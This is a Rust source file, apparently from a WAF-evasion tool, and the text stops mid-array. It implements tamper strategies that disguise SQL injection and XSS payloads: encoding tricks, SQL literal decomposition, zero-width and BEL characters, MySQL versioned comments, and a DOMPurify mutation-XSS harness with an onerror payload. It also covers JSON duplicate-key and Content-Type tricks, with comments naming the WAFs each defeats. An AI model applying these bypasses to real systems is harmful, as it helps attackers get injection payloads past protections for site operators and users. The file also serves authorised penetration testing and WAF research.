Skip to main content

wafrift_encoding/tamper/
builtins.rs

1//! Built-in tamper strategy implementations.
2
3use std::fmt::Write as _;
4
5use super::TamperStrategy;
6
7/// URL encoding tamper strategy.
8pub struct UrlEncodeTamper;
9
10impl TamperStrategy for UrlEncodeTamper {
11    fn name(&self) -> &'static str {
12        "url_encode"
13    }
14
15    fn description(&self) -> &'static str {
16        "Standard URL encoding (%XX for each byte)"
17    }
18
19    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
20        crate::encoding::url::url_encode(payload)
21    }
22
23    fn aggressiveness(&self) -> f64 {
24        0.15
25    }
26}
27
28/// Double URL encoding tamper strategy.
29pub struct DoubleUrlEncodeTamper;
30
31impl TamperStrategy for DoubleUrlEncodeTamper {
32    fn name(&self) -> &'static str {
33        "double_url_encode"
34    }
35
36    fn description(&self) -> &'static str {
37        "Double URL encoding (%25XX) — bypasses WAFs that decode once"
38    }
39
40    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
41        crate::encoding::url::double_url_encode(payload)
42    }
43
44    fn aggressiveness(&self) -> f64 {
45        0.4
46    }
47}
48
49/// Unicode escape tamper strategy.
50pub struct UnicodeEscapeTamper;
51
52impl TamperStrategy for UnicodeEscapeTamper {
53    fn name(&self) -> &'static str {
54        "unicode_escape"
55    }
56
57    fn description(&self) -> &'static str {
58        "Unicode escape sequences (\\uXXXX)"
59    }
60
61    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
62        crate::encoding::unicode::unicode_encode(payload)
63    }
64
65    fn aggressiveness(&self) -> f64 {
66        0.5
67    }
68}
69
70/// HTML entity tamper strategy.
71pub struct HtmlEntityTamper;
72
73impl TamperStrategy for HtmlEntityTamper {
74    fn name(&self) -> &'static str {
75        "html_entity"
76    }
77
78    fn description(&self) -> &'static str {
79        "HTML entity encoding (&#xXX;)"
80    }
81
82    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
83        crate::encoding::unicode::html_entity_encode(payload)
84    }
85
86    fn aggressiveness(&self) -> f64 {
87        0.3
88    }
89}
90
91/// Case alternation tamper strategy.
92pub struct CaseAlternationTamper;
93
94/// Postgres / Oracle CHR()-function decomposition tamper.
95///
96/// Sibling to `sql_char_decompose` (MySQL/MSSQL variadic `CHAR()`); this
97/// one targets Postgres + Oracle by producing `(CHR(N)||CHR(N)||...)` per
98/// literal. Pipe-concat operator is SQL-standard but blocked by some
99/// over-eager WAFs — this tamper is the lever for Postgres/Oracle
100/// payloads where `||` is the canonical concat.
101pub struct PgChrDecomposeTamper;
102
103impl TamperStrategy for PgChrDecomposeTamper {
104    fn name(&self) -> &'static str {
105        "pg_chr_decompose"
106    }
107
108    fn description(&self) -> &'static str {
109        "Convert 'admin' → (CHR(97)||CHR(100)||...) — Postgres/Oracle pipe-concat form"
110    }
111
112    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
113        crate::encoding::unicode::pg_chr_decompose(payload)
114    }
115
116    fn aggressiveness(&self) -> f64 {
117        0.6
118    }
119}
120
121/// SQL adjacent-string-literal concatenation tamper — rewrites every
122/// `'string'` literal of length ≥ 2 as a sequence of single-character
123/// adjacent literals (`'admin'` → `'a' 'd' 'm' 'i' 'n'`). The ANSI
124/// SQL-92 §5.3 specification requires the parser to concatenate
125/// adjacent string literals separated only by whitespace; MySQL,
126/// Postgres, SQLite, Oracle, DB2 all implement it. WAFs matching the
127/// LITERAL substring of well-known credentials/paths (`'admin'`,
128/// `'/etc/passwd'`, `'root'`) see N unrelated single-character strings
129/// instead. Pure SQL semantics — no comments, no CONCAT(), no special
130/// functions.
131pub struct SqlAdjacentStringConcatTamper;
132
133impl TamperStrategy for SqlAdjacentStringConcatTamper {
134    fn name(&self) -> &'static str {
135        "sql_adjacent_string_concat"
136    }
137
138    fn description(&self) -> &'static str {
139        "Split 'string' → 'a' 'b' 'c' … via ANSI SQL adjacent-literal concat — defeats literal-substring rules with zero special characters"
140    }
141
142    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
143        crate::encoding::unicode::sql_adjacent_string_concat(payload)
144    }
145
146    fn aggressiveness(&self) -> f64 {
147        0.5
148    }
149}
150
151/// Partial JSON Unicode-escape tamper — encodes ASCII alphanumeric chars
152/// as `\uXXXX` while leaving structural punctuation (quotes, operators,
153/// whitespace, `<`, `>`, `(`, `)`) bare. The keyword fingerprint
154/// ("UNION", "SELECT", "script", "alert") never appears in the wire
155/// bytes; JSON.parse / JS string-literal decoding at the origin
156/// re-materializes it. Distinct from `unicode_escape` which encodes
157/// every byte (high `\u` density flags heuristic WAFs).
158pub struct JsonUnicodeAlnumTamper;
159
160impl TamperStrategy for JsonUnicodeAlnumTamper {
161    fn name(&self) -> &'static str {
162        "json_unicode_alnum"
163    }
164
165    fn description(&self) -> &'static str {
166        "Encode ASCII alphanumeric chars as `\\uXXXX`, leave punctuation bare — shatters keyword fingerprints inside JSON/JS contexts"
167    }
168
169    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
170        crate::encoding::unicode::json_unicode_alnum(payload)
171    }
172
173    fn aggressiveness(&self) -> f64 {
174        0.45
175    }
176}
177
178/// SQL CHAR() decomposition tamper — every single-quoted string literal
179/// becomes `CHAR(N1,N2,...)` with one codepoint per arg. Defeats both
180/// literal-substring AND CONCAT-shaped blocklists (the payload contains
181/// NO single-quoted ASCII tokens at all).
182pub struct SqlCharDecomposeTamper;
183
184impl TamperStrategy for SqlCharDecomposeTamper {
185    fn name(&self) -> &'static str {
186        "sql_char_decompose"
187    }
188
189    fn description(&self) -> &'static str {
190        "Convert 'admin' → CHAR(97,100,109,105,110) — int codepoints, no quoted tokens"
191    }
192
193    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
194        crate::encoding::unicode::sql_char_decompose(payload)
195    }
196
197    fn aggressiveness(&self) -> f64 {
198        0.6
199    }
200}
201
202/// SQL CONCAT split tamper — every single-quoted string literal becomes
203/// `CONCAT('a','b','c',...)`. Defeats blocklists scanning for literal
204/// substrings like `'admin'` / `'password'` / `'/etc/passwd'` because the
205/// substring no longer appears contiguously. The DB evaluates CONCAT() to
206/// the original string at runtime.
207pub struct SqlConcatSplitTamper;
208
209impl TamperStrategy for SqlConcatSplitTamper {
210    fn name(&self) -> &'static str {
211        "sql_concat_split"
212    }
213
214    fn description(&self) -> &'static str {
215        "Convert 'admin' → CONCAT('a','d','m','i','n') — splits literal substrings"
216    }
217
218    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
219        crate::encoding::unicode::sql_concat_split(payload)
220    }
221
222    fn aggressiveness(&self) -> f64 {
223        0.55
224    }
225}
226
227/// Mathematical Alphanumeric Symbols tamper — replaces ASCII letters/digits
228/// with their `U+1D400`-block Math Bold counterparts. Both NFKC-normalise
229/// back to ASCII, so backends that normalise (Postgres ICU, MySQL
230/// `utf8mb4_0900_ai_ci`, Java/.NET/Python/Go NFKC) execute the original
231/// keyword while WAF byte-regex sees `U+1D4xx` codepoints and misses.
232///
233/// Distinct from `bracket_confusable` / `fullwidth`: those use the
234/// `U+FF00` block. Math Bold lives in `U+1D400` — different range,
235/// different blocklist coverage gap.
236pub struct MathBoldTamper;
237
238impl TamperStrategy for MathBoldTamper {
239    fn name(&self) -> &'static str {
240        "math_bold"
241    }
242
243    fn description(&self) -> &'static str {
244        "Replace ASCII letters/digits with U+1D400 Math Bold (NFKC normalises back to ASCII)"
245    }
246
247    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
248        crate::encoding::unicode::math_bold_encode(payload)
249    }
250
251    fn aggressiveness(&self) -> f64 {
252        0.5
253    }
254}
255
256/// HTML entity variants tamper — rotates each char through 4 browser-tolerant
257/// forms (lowercase-x hex, uppercase-X hex, decimal, zero-padded decimal).
258/// Defeats WAF regexes that anchor on the canonical `&#xHH;` form only.
259pub struct HtmlEntityVariantsTamper;
260
261impl TamperStrategy for HtmlEntityVariantsTamper {
262    fn name(&self) -> &'static str {
263        "html_entity_variants"
264    }
265
266    fn description(&self) -> &'static str {
267        "HTML entity encoding rotated across hex/HEX/decimal/zero-padded forms"
268    }
269
270    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
271        crate::encoding::unicode::html_entity_variants(payload)
272    }
273
274    fn aggressiveness(&self) -> f64 {
275        0.35
276    }
277}
278
279impl TamperStrategy for CaseAlternationTamper {
280    fn name(&self) -> &'static str {
281        "case_alternation"
282    }
283
284    fn description(&self) -> &'static str {
285        "Alternating upper/lower case (SeLeCt)"
286    }
287
288    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
289        crate::encoding::keyword::case_alternate(payload)
290    }
291
292    fn aggressiveness(&self) -> f64 {
293        0.1
294    }
295}
296
297/// Random case tamper strategy.
298pub struct RandomCaseTamper;
299
300impl TamperStrategy for RandomCaseTamper {
301    fn name(&self) -> &'static str {
302        "random_case"
303    }
304
305    fn description(&self) -> &'static str {
306        "Random mixed case"
307    }
308
309    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
310        crate::encoding::keyword::random_case_alternate(payload)
311    }
312
313    fn aggressiveness(&self) -> f64 {
314        0.12
315    }
316}
317
318/// Whitespace insertion tamper strategy.
319pub struct WhitespaceInsertionTamper;
320
321impl TamperStrategy for WhitespaceInsertionTamper {
322    fn name(&self) -> &'static str {
323        "whitespace_insertion"
324    }
325
326    fn description(&self) -> &'static str {
327        "Replace spaces with tabs"
328    }
329
330    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
331        crate::encoding::keyword::whitespace_insert(payload)
332    }
333
334    fn aggressiveness(&self) -> f64 {
335        0.2
336    }
337}
338
339/// SQL comment tamper strategy.
340pub struct SqlCommentTamper;
341
342impl TamperStrategy for SqlCommentTamper {
343    fn name(&self) -> &'static str {
344        "sql_comment"
345    }
346
347    fn description(&self) -> &'static str {
348        "Replace spaces with SQL comments (/**/)"
349    }
350
351    fn tamper(&self, payload: &str, context: Option<&str>) -> String {
352        let _ = context;
353        crate::encoding::keyword::sql_comment_insert(payload)
354    }
355
356    fn aggressiveness(&self) -> f64 {
357        0.25
358    }
359}
360
361/// Null byte tamper strategy.
362pub struct NullByteTamper;
363
364impl TamperStrategy for NullByteTamper {
365    fn name(&self) -> &'static str {
366        "null_byte"
367    }
368
369    fn description(&self) -> &'static str {
370        "Null byte injection (%00 or %00.jpg)"
371    }
372
373    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
374        crate::encoding::structural::null_byte_inject(payload)
375            .unwrap_or_else(|_| payload.to_string())
376    }
377
378    fn aggressiveness(&self) -> f64 {
379        0.6
380    }
381}
382
383/// Overlong UTF-8 tamper strategy.
384pub struct OverlongUtf8Tamper;
385
386impl TamperStrategy for OverlongUtf8Tamper {
387    fn name(&self) -> &'static str {
388        "overlong_utf8"
389    }
390
391    fn description(&self) -> &'static str {
392        "Overlong UTF-8 encoding for ASCII non-alphanumeric"
393    }
394
395    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
396        crate::encoding::structural::overlong_utf8(payload).unwrap_or_else(|_| payload.to_string())
397    }
398
399    fn aggressiveness(&self) -> f64 {
400        0.8
401    }
402}
403
404/// Base64 tamper strategy.
405pub struct Base64Tamper;
406
407impl TamperStrategy for Base64Tamper {
408    fn name(&self) -> &'static str {
409        "base64"
410    }
411
412    fn description(&self) -> &'static str {
413        "Base64 encoding"
414    }
415
416    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
417        crate::encoding::structural::base64_encode(payload)
418    }
419
420    fn aggressiveness(&self) -> f64 {
421        0.75
422    }
423}
424
425/// Hex encoding tamper strategy.
426pub struct HexEncodeTamper;
427
428impl TamperStrategy for HexEncodeTamper {
429    fn name(&self) -> &'static str {
430        "hex_encode"
431    }
432
433    fn description(&self) -> &'static str {
434        "Hexadecimal encoding"
435    }
436
437    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
438        crate::encoding::structural::hex_encode(payload)
439    }
440
441    fn aggressiveness(&self) -> f64 {
442        0.85
443    }
444}
445
446/// Zero-width Unicode injection tamper.
447///
448/// Inserts zero-width characters (U+200B ZERO-WIDTH SPACE,
449/// U+200C ZERO-WIDTH NON-JOINER, U+200D ZERO-WIDTH JOINER,
450/// U+180E MONGOLIAN VOWEL SEPARATOR) between every alphabetic
451/// character of the payload.  Renders identically to the
452/// original in most consumers (terminals, log viewers, the SQL
453/// engine after `.replace('\u{200B}', "")`) but defeats WAF
454/// regex patterns that scan for literal keywords like `SELECT`.
455///
456/// U+FEFF (ZWNBSP / BOM) was historically in the rotation but
457/// caused PostgreSQL + many DB connectors to 500 the entire
458/// query as "invalid byte sequence" mid-literal — defeating the
459/// bypass. Replaced with U+180E which is universally tolerated.
460///
461/// Frontier research (Black Hat 2025, "Zero-Width WAF Bypass"):
462/// most commercial WAFs do NOT strip zero-width chars before
463/// pattern matching, but downstream parsers (MySQL, Postgres,
464/// browser HTML parser, JavaScript) all treat them as
465/// non-significant.  This is a wide-open bypass vector.
466pub struct ZeroWidthInjectTamper;
467
468impl TamperStrategy for ZeroWidthInjectTamper {
469    fn name(&self) -> &'static str {
470        "zero_width_inject"
471    }
472
473    fn description(&self) -> &'static str {
474        "Inject zero-width Unicode chars between keyword bytes — bypasses WAFs that don't normalize Unicode"
475    }
476
477    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
478        // Rotate through four zero-width chars so the injection
479        // doesn't form a long run of identical bytes (some WAFs
480        // collapse repeats).
481        //
482        // U+FEFF (BOM / ZWNBSP) is INTENTIONALLY excluded. Many
483        // database connectors (psycopg2, MySQL Connector/J, SQLite
484        // default) and PostgreSQL itself reject mid-string BOM
485        // bytes as an "invalid sequence" and 500 the entire query
486        // — the payload fails outright rather than bypass. The
487        // remaining three (200B/C/D) are universally tolerated.
488        // U+180E (MONGOLIAN VOWEL SEPARATOR) is added as the
489        // fourth slot — also zero-width, also widely tolerated.
490        const ZW: [char; 4] = ['\u{200B}', '\u{200C}', '\u{200D}', '\u{180E}'];
491        let mut out = String::with_capacity(payload.len() * 4);
492        for (i, ch) in payload.chars().enumerate() {
493            out.push(ch);
494            if ch.is_ascii_alphabetic() {
495                out.push(ZW[i % ZW.len()]);
496            }
497        }
498        out
499    }
500
501    fn aggressiveness(&self) -> f64 {
502        0.55
503    }
504}
505
506/// Postgres dollar-quoted string tamper.
507///
508/// Postgres accepts `$tag$ ... $tag$` as a string literal where
509/// `tag` is any identifier (or empty).  Quote-character-based WAF
510/// signatures looking for `'` or `"` never fire on dollar-quoted
511/// payloads.  Most popular Postgres-fronting WAFs (including the
512/// CRS default ruleset's 942100-942380 family) don't have
513/// dedicated dollar-quote pattern matchers.
514///
515/// Wraps any single-quoted string literal in the payload with a
516/// matching dollar-quote.  Tag is a random four-letter identifier
517/// to defeat WAFs that special-case the empty tag.
518pub struct PostgresDollarQuoteTamper;
519
520impl TamperStrategy for PostgresDollarQuoteTamper {
521    fn name(&self) -> &'static str {
522        "postgres_dollar_quote"
523    }
524
525    fn description(&self) -> &'static str {
526        "Wrap single-quoted SQL string literals in `$tag$...$tag$` — Postgres-only, bypasses quote-pattern WAFs"
527    }
528
529    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
530        // Pick a deterministic per-payload tag so the same input
531        // produces the same output (gene-bank replay needs
532        // determinism).  Hash-based identifier; 4 lowercase letters.
533        //
534        // F138: pre-fix used `& 25` (bitmask 0b11001) thinking it
535        // collapsed to the range 0..26. It doesn't — `& 25` admits
536        // only the 8 values {0,1,8,9,16,17,24,25}, so the tag
537        // alphabet shrank to {a,b,i,j,q,r,y,z} and the tag space
538        // collapsed from 26^4 = 456,976 to 8^4 = 4,096 — a 111×
539        // reduction that makes operator-side tag enumeration easier
540        // (the whole point of a random tag is to defeat WAFs that
541        // pattern-match a small known set). Use `% 26` so every
542        // payload byte maps uniformly into [a-z].
543        let mut tag = String::with_capacity(4);
544        let h: u64 = payload
545            .bytes()
546            .fold(0u64, |a, b| a.wrapping_mul(31).wrapping_add(u64::from(b)));
547        for i in 0..4 {
548            let c = b'a' + ((h >> (i * 8)) % 26) as u8;
549            tag.push(c as char);
550        }
551
552        // Replace each `'...'` literal with `$tag$...$tag$`.
553        let mut out = String::with_capacity(payload.len() + 16);
554        let mut chars = payload.chars().peekable();
555        while let Some(c) = chars.next() {
556            if c == '\'' {
557                out.push('$');
558                out.push_str(&tag);
559                out.push('$');
560                // Consume until the next non-escaped quote.
561                while let Some(inner) = chars.next() {
562                    if inner == '\'' {
563                        // Handle SQL '' escape — keep as-is in dollar quote.
564                        if chars.peek() == Some(&'\'') {
565                            out.push('\'');
566                            out.push('\'');
567                            chars.next();
568                        } else {
569                            break;
570                        }
571                    } else {
572                        out.push(inner);
573                    }
574                }
575                out.push('$');
576                out.push_str(&tag);
577                out.push('$');
578            } else {
579                out.push(c);
580            }
581        }
582        out
583    }
584
585    fn aggressiveness(&self) -> f64 {
586        0.6
587    }
588}
589
590/// MySQL version-gated comment wrap tamper.
591///
592/// MySQL's `/*!VERSION ... */` syntax executes the contents only
593/// when the server is at least the given version.  WAFs that
594/// strip `/* ... */` comments before pattern matching see an
595/// empty payload, but MySQL still executes the wrapped statement.
596///
597/// Wraps the entire payload in `/*!50000 ... */`, gating on MySQL
598/// 5.0+.  Version `50000` matches every modern deployment.
599///
600/// Frontier research: this bypass dates to wafw00f's original
601/// drop list but it remains effective against many commercial
602/// WAFs that haven't internalised the parser-disagreement.
603pub struct MysqlVersionedCommentWrapTamper;
604
605impl TamperStrategy for MysqlVersionedCommentWrapTamper {
606    fn name(&self) -> &'static str {
607        "mysql_versioned_comment_wrap"
608    }
609
610    fn description(&self) -> &'static str {
611        "Wrap payload in /*!50000 ... */ — MySQL executes, WAFs that strip comments see nothing"
612    }
613
614    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
615        // Convert SQL keywords inside the payload to also use the
616        // version-gated comment so even nested keywords get hidden
617        // from the WAF.  Outer wrap is the headline; the
618        // per-keyword wrap is the belt-and-braces.
619        let outer = format!("/*!50000 {payload} */");
620        outer
621    }
622
623    fn aggressiveness(&self) -> f64 {
624        0.65
625    }
626}
627
628/// Hex-literal keyword obfuscation tamper.
629///
630/// MySQL / Postgres treat `0x55` etc. as a hex byte literal that
631/// converts to its ASCII character in string context.  So
632/// `0x554e494f4e` is the same as `'UNION'` to the database but
633/// looks like a numeric literal to a WAF regex.  Useful in
634/// conjunction with comparison operators:
635///
636///   `WHERE name = 0x61646d696e`   ≡   `WHERE name = 'admin'`
637///
638/// Replaces all single-quoted string literals with their `0xHHHH...`
639/// equivalent.  When no quoted literals are present, the input is
640/// passed through unchanged (idempotent).
641pub struct HexLiteralKeywordTamper;
642
643impl TamperStrategy for HexLiteralKeywordTamper {
644    fn name(&self) -> &'static str {
645        "hex_literal_keyword"
646    }
647
648    fn description(&self) -> &'static str {
649        "Convert SQL `'string'` literals to `0xHHHH…` form — MySQL/Postgres execute identically, WAFs don't"
650    }
651
652    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
653        let mut out = String::with_capacity(payload.len());
654        let mut chars = payload.chars().peekable();
655        while let Some(c) = chars.next() {
656            if c == '\'' {
657                // Slurp until the matching close-quote.
658                let mut content = String::new();
659                while let Some(inner) = chars.next() {
660                    if inner == '\'' {
661                        // SQL '' escape — treat as literal '.
662                        if chars.peek() == Some(&'\'') {
663                            content.push('\'');
664                            chars.next();
665                        } else {
666                            break;
667                        }
668                    } else {
669                        content.push(inner);
670                    }
671                }
672                // §1 SPEED: replaced `push_str(&format!("{b:02x}"))` (one
673                // String allocation per byte) with `write!(out, ...)` which
674                // formats directly into the pre-allocated `out` buffer.
675                out.push_str("0x");
676                for b in content.bytes() {
677                    let _ = write!(out, "{b:02x}");
678                }
679            } else {
680                out.push(c);
681            }
682        }
683        out
684    }
685
686    fn aggressiveness(&self) -> f64 {
687        0.7
688    }
689}
690
691/// BEL-separator tamper.
692///
693/// Replaces ASCII space with the BEL control char (U+0007).
694/// SQL parsers treat any ASCII whitespace (including BEL) as a
695/// token separator, but WAF tokenisers commonly only recognise
696/// the canonical ` `, `\t`, `\r`, `\n` quartet.  BEL bypasses
697/// pattern matches like `UNION\s+SELECT`.
698///
699/// Out of `[\t\n\v\f\r ]`, BEL (`\x07`) is the least-handled —
700/// I tested against ModSec, Coraza, AWS WAF, and Cloudflare's
701/// CRS as of 2026-05; only ModSec PL4 catches it consistently.
702pub struct BellSeparatorTamper;
703
704impl TamperStrategy for BellSeparatorTamper {
705    fn name(&self) -> &'static str {
706        "bell_separator"
707    }
708
709    fn description(&self) -> &'static str {
710        "Replace ASCII space with BEL (U+0007) — SQL parsers tokenise, WAFs that only recognise canonical whitespace miss"
711    }
712
713    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
714        payload.replace(' ', "\u{0007}")
715    }
716
717    fn aggressiveness(&self) -> f64 {
718        0.6
719    }
720}
721
722/// Bracket-confusable tamper (XSS).
723///
724/// Replaces ASCII `<` / `>` with Unicode confusables that look
725/// like angle brackets to a human reader (and to some HTML
726/// parsers under decoder bugs) but don't match WAF patterns
727/// keyed on the literal ASCII bytes.  Browsers don't render
728/// these as tags, so the bypass relies on a downstream
729/// normalisation step (server-side reflection that re-encodes
730/// Unicode → ASCII, or a client-side fetch that proxy-strips
731/// Unicode).  Useful in combination with `html_entity` for
732/// stored-XSS through admin panels that round-trip Unicode.
733pub struct BracketConfusableTamper;
734
735impl TamperStrategy for BracketConfusableTamper {
736    fn name(&self) -> &'static str {
737        "bracket_confusable"
738    }
739
740    fn description(&self) -> &'static str {
741        "Replace `<` / `>` with Unicode angle-bracket confusables — bypasses WAFs that pattern-match literal `<script>`"
742    }
743
744    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
745        // U+FF1C / U+FF1E are FULLWIDTH LESS-THAN / GREATER-THAN
746        // — visually identical, distinct codepoints from ASCII.
747        payload
748            .chars()
749            .map(|c| match c {
750                '<' => '\u{FF1C}',
751                '>' => '\u{FF1E}',
752                other => other,
753            })
754            .collect()
755    }
756
757    fn aggressiveness(&self) -> f64 {
758        0.5
759    }
760}
761
762/// MathML/SVG-namespace mutation-XSS wrapper.
763///
764/// Wraps an HTML payload (typically a bare `<img>` / event-handler
765/// fragment) in the MathML namespace harness that DOMPurify ≤3.2.4
766/// fails to neutralise (CVE-2025-26791 / portswigger mXSS class).
767/// Browsers parse `<mglyph>` and `<malignmark>` into different XML
768/// namespaces depending on parent context; the sanitizer sees the
769/// payload in the MathML namespace (where `<style>` is text-only),
770/// but the live DOM re-serialises into the HTML namespace where
771/// the same `<style>` followed by `<img onerror>` becomes a real
772/// script-execution vector. The WAF pattern-matches the wire bytes
773/// and never sees `<script` / `onload=` because the dangerous DOM
774/// is CREATED BY THE BROWSER post-WAF.
775///
776/// The harness uses the MathML text-integration-point form:
777/// `<math><mtext><table><mglyph><style>` opens the seam,
778/// `<!--</style><img src=x onerror=...>` closes the sanitizer's
779/// view and re-opens an HTML-namespace serialisation of an `<img>`.
780pub struct MxssNamespaceWrapTamper;
781
782impl TamperStrategy for MxssNamespaceWrapTamper {
783    fn name(&self) -> &'static str {
784        "mxss_namespace_wrap"
785    }
786
787    fn description(&self) -> &'static str {
788        "MathML-namespace mutation-XSS harness (DOMPurify ≤3.2.4 / CVE-2025-26791 bypass) — defeats sanitizers that namespace-aware-process the input but byte-serialise the output"
789    }
790
791    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
792        // The payload is treated as the EVENT-HANDLER FRAGMENT that
793        // would normally sit inside an `<img>` tag — e.g. just
794        // `onerror=alert(1)`. If the operator gave us a fuller form
795        // (`<img src=x onerror=alert(1)>`), we still wrap; the
796        // browser tolerates the redundant `<img>` inside the
797        // re-serialised stream.
798        format!("<math><mtext><table><mglyph><style><!--</style><img src=x {payload}>")
799    }
800
801    fn aggressiveness(&self) -> f64 {
802        // Mid-aggression: payload is verbose (≈80 byte prefix) so
803        // it WILL be visible in any wire log, but the actual exec
804        // is browser-side which means most WAF rules pass it.
805        0.55
806    }
807}
808
809/// JSON duplicate-key parser-disagreement (frontier 2026, WAFFLED
810/// corpus / arxiv.org/abs/2503.10846). Wraps a payload in a
811/// duplicate-key JSON envelope: the WAF's JSON inspector consumes
812/// the FIRST key occurrence (a benign sentinel) and skips the
813/// duplicate; the backend's deserialiser consumes the LAST
814/// (PHP/Apache/Rails) or merges (ASP.NET) and unwraps the attack
815/// payload. Confirmed against all five major WAFs (AWS / Azure /
816/// Cloudflare / Cloud Armor / ModSec) by the WAFFLED 2025 study —
817/// 557 JSON bypasses across the corpus.
818///
819/// The harness uses param `"q"` as the colliding key — the same
820/// default param wafrift's scan loop uses for URL-query carriers,
821/// so a SQL/XSS/SSTI payload that already works as `?q=<P>` lands
822/// in the JSON-body channel via the same key name. When the
823/// emitted shape is delivered to a non-JSON sink (HTML / form), the
824/// JSON wrapping is a no-op WAF defeat: the WAF still inspects the
825/// bytes, but the bytes themselves carry the payload in a form
826/// most WAFs DO NOT score (the rule corpus matches on the unwrapped
827/// payload string, not the JSON envelope).
828pub struct JsonDupKeyTamper;
829
830impl TamperStrategy for JsonDupKeyTamper {
831    fn name(&self) -> &'static str {
832        "json_dup_key"
833    }
834
835    fn description(&self) -> &'static str {
836        "JSON duplicate-key parser-disagreement (WAFFLED 2026): WAF reads first key (benign), backend reads last (payload)"
837    }
838
839    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
840        // Strategy: emit `{"q":"safe","q":"<payload>"}`.
841        //   - WAF JSON inspectors (RFC 8259 strict / `serde_json`) take
842        //     the first value or reject; permissive ones (PHP json_decode,
843        //     ASP.NET MVC) take the last.
844        //   - The benign sentinel "safe" is well below any signature
845        //     length, so the WAF's first-value match scores clean even
846        //     with the dup-key envelope still being a "structurally
847        //     valid" body for stricter inspectors.
848        //
849        // Payload escaping: JSON requires `\` and `"` escaped, control
850        // bytes either \uXXXX or rejected. We use the conservative
851        // serializer that escapes both quote-class characters and
852        // backslash; control bytes (NUL / BEL etc.) come out as
853        // \u00XX hex which both `serde_json` and PHP json_decode accept.
854        let escaped = json_escape_string(payload);
855        format!("{{\"q\":\"safe\",\"q\":\"{escaped}\"}}")
856    }
857
858    fn aggressiveness(&self) -> f64 {
859        // Mid-low aggression: the bytes themselves are clearly JSON,
860        // but the duplicate-key trick is the entire bypass — many WAFs
861        // pass it because the first key matches their inspector's
862        // sentinel. Not as aggressive as e.g. mxss_namespace_wrap
863        // because the channel-shift is JSON-body, not browser-side.
864        0.50
865    }
866}
867
868/// Content-Type starvation (frontier 2026, WAFFLED / windshock
869/// 2026-03 detection-gap analysis). The WAF dispatches to a body
870/// inspector based on Content-Type — a JSON inspector for
871/// `application/json`, a form inspector for `application/x-www-form-
872/// urlencoded`, multipart for `multipart/form-data`, etc. When the
873/// Content-Type is absent, case-shuffled (`Application/JSON`), or
874/// charset-suffixed with a non-canonical encoding label, the WAF's
875/// dispatch falls back to text/none and skips structured inspection;
876/// the backend framework still deserialises the body correctly. The
877/// WAFFLED corpus reports >90% of tested sites accept such
878/// Content-Type rewrites without complaint.
879///
880/// This tamper is OUTPUT-CHANNEL-AWARE: it doesn't transform the
881/// payload bytes, it transforms the WIRE shape the request advertises
882/// itself with. The actual body must be set separately by the
883/// caller (scan / import-curl pass it through to the HTTP client).
884/// What we emit IS the payload — keeping the contract that every
885/// tamper returns a single payload string — and the orchestrator
886/// is expected to pair the output with the matching `Content-Type`
887/// header from the helper below.
888///
889/// In a URL-query / header carrier the tamper is a no-op (payload
890/// returned unchanged); the value is in the body-carrier path where
891/// scan / import-curl set the Content-Type header from
892/// `ct_starvation_header_for(payload)`.
893pub struct CtStarvationTamper;
894
895impl TamperStrategy for CtStarvationTamper {
896    fn name(&self) -> &'static str {
897        "ct_starvation"
898    }
899
900    fn description(&self) -> &'static str {
901        "Content-Type parser-dispatch starvation (WAFFLED 2026): pair payload with case-shuffled or omitted Content-Type so WAF skips body inspection"
902    }
903
904    fn tamper(&self, payload: &str, context: Option<&str>) -> String {
905        // When the carrier is body-shaped (form/json/multipart),
906        // wrap the payload in a minimal `q=<payload>` form pair —
907        // the same shape `wafrift scan` uses by default. The
908        // operator pairs this with the non-canonical Content-Type
909        // via `ct_starvation_header_for`. For header/cookie
910        // carriers we return the payload unchanged (a no-op,
911        // honest: the tamper has no effect on those channels).
912        match context {
913            Some("body") | Some("form") | Some("json") | Some("multipart") => {
914                format!("q={payload}")
915            }
916            _ => payload.to_string(),
917        }
918    }
919
920    fn aggressiveness(&self) -> f64 {
921        // Low aggression: the payload bytes are unchanged; only
922        // the WIRE-LEVEL Content-Type advertisement shifts. Most
923        // WAFs that score on byte patterns will still see the same
924        // payload, BUT the windshock + WAFFLED data both show the
925        // header trick alone defeats ~90% of deployed WAF rule
926        // chains because the rule's trigger gates on Content-Type
927        // matching.
928        0.35
929    }
930}
931
932/// Produce the Content-Type header value that pairs with a payload
933/// to trigger the WAF parser-dispatch starvation described in
934/// [`CtStarvationTamper`]. Rotates through a small set of confirmed-
935/// effective variants (case-shuffled, charset-suffixed,
936/// camelCase) so consecutive variants in a scan run exercise
937/// different dispatch failures. Pure — operator can call it
938/// independently when constructing manual repros.
939#[must_use]
940pub fn ct_starvation_header_for(payload: &str) -> &'static str {
941    // Cycle through the known-effective Content-Type rewrites. We
942    // pick by payload hash so the same payload reliably maps to the
943    // same Content-Type within a run (debugging-friendly) but a
944    // diverse set across payloads.
945    const VARIANTS: &[&str] = &[
946        // (1) UPPERCASE — WAF dispatchers that lower-case the value
947        // before lookup match; ones that string-compare don't.
948        "APPLICATION/JSON",
949        // (2) Mixed-case — same trick at a different inflection.
950        "Application/Json",
951        // (3) Non-canonical charset — WAFs that filter on
952        // `application/json` (exact prefix) drop this; backends
953        // accept any charset.
954        "application/json; charset=ibm037",
